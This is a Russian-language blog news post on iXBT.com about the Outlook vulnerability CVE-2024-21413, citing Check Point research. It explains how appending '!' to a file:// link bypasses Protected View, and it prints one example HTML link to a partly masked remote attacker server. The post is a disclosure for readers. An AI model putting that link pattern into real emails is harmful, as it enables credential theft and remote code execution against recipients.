Критическая уязвимость в офисном пакете Microsoft позволяет неаутентифицированным злоумышленникам выполнять вредоносный код. Новая «дыра» в популярном программном обеспечении

Пост опубликован в блогах iXBT.com, его автор не имеет отношения к редакции iXBT.com
| Новость | Программы, сервисы и сайты

В офисном пакете компании Microsoft обнаружена новая критическая уязвимость, которой могут воспользоваться не аутентифицированные злоумышленники и выполнить вредоносный код. Уязвимость уже зарегистрирована под CVE-2024-21413 и появляется при получении электронного письма с вредоносной ссылкой на не обновленные версии Outlook. Уже известно, что хакерам получается обходить встроенную защиту просмотра Protected View, которая в принципе должна блокировать весь вредоносный контент, получаемый по почте, но в данном случае файлы доступны не только для просмотра, а даже для редактирования. Уже известно, что для исполнения уязвимости CVE-2024-21413 не требуется взаимодействие с пользователем.

Автор: @kandinsky21_bot

При правильной атаке со стороны хакеров им будут доступны все необходимые привилегии для работы с файлами. Уже известно, что уязвимость затрагивает сразу несколько офисных пакетов компании Microsoft, а это LTSC 2021, Microsoft 365, Outlook 2016, Office 2019.

Установлено, что хакерам удалось научиться обходить встроенные механизмы защиты в электронных письмах, используя протоколы file:// для обращения к удаленным серверам злоумышленников. Добавление всего лишь 1 символа позволило обойти безопасность офисного пакета. Сразу после ссылки на файл злоумышленники вписывали «!» знак, который не вызывал подозрение к безопасности и позволял обращаться к удалённым серверам для запуска файла.

К примеру, ссылка на файл может содержать такой текст:

<a href="file:///\\*.*.*.111\office\*st.pdf!something">важные документы</a>

Воспользовавшись уязвимостью CVE-2024-21413, злоумышленники могли получить доступ к персональным данным пользователей, учетных данных программного обеспечения и заражению компьютеров вредоносными программами.

В данный момент уже есть «таблетка» от уязвимости CVE-2024-21413, которая доступна на официальном сайте компании.

Источник: https://research.checkpoint.com

Сейчас на главной

Новости

Публикации

Справится со всем — от зарослей травы до кустарника: Обзор мощного аккумуляторного триммера Greenworks 2105707

Недавно мы рассмотрели мощную аккумуляторную газонокосилку с батареей на 60В. Она, действительно выручает в вопросах борьбы с травой на ровном участке. Но ее возможности не безграничны. Если у вас...

Идеальное место для лунной базы найдено? NASA обнаружило подземные пещеры в Море Спокойствия

Серебристый диск Луны, безмолвный страж земных ночей, всегда манил человечество обещанием неизведанного. Фантазии о лунных базах и колониях, некогда казавшиеся сюжетами для фантастических романов,...

Охота на темную материю: пульсары — секретное оружие астрономов

Вселенная полна загадок. Черные дыры, квазары, нейтронные звезды — эти астрономические объекты до сих пор ставят в тупик ученых. Но есть тайна, которая стоит особняком, тайна,...

Не Unity, но тоже сносно: обзор игрового движка Godot Engine

Все, кто увлекается разработкой, наверняка знают, что игры создают на специальных движках. Самые популярные из них — это Unity и Unreal Engine. Однако на сегодняшний день их существует...

На каких дровах не стоит жарить шашлык: самые частые ошибки

Приготовление вкусного и ароматного шашлыка — дело, на первый взгляд, простое, но на самом деле оно требует тщательного подхода, особенно к выбору дров. Этот важный момент определяет...

Физики раскрыли секрет квантового перехода изолятор-металл: как вещество меняет свои свойства за мгновение?

Мы привыкли воспринимать мир как нечто статичное, неизменное. Кирпичи остаются кирпичами, вода — водой, а металл — металлом. Однако квантовая физика, подобно неутомимому...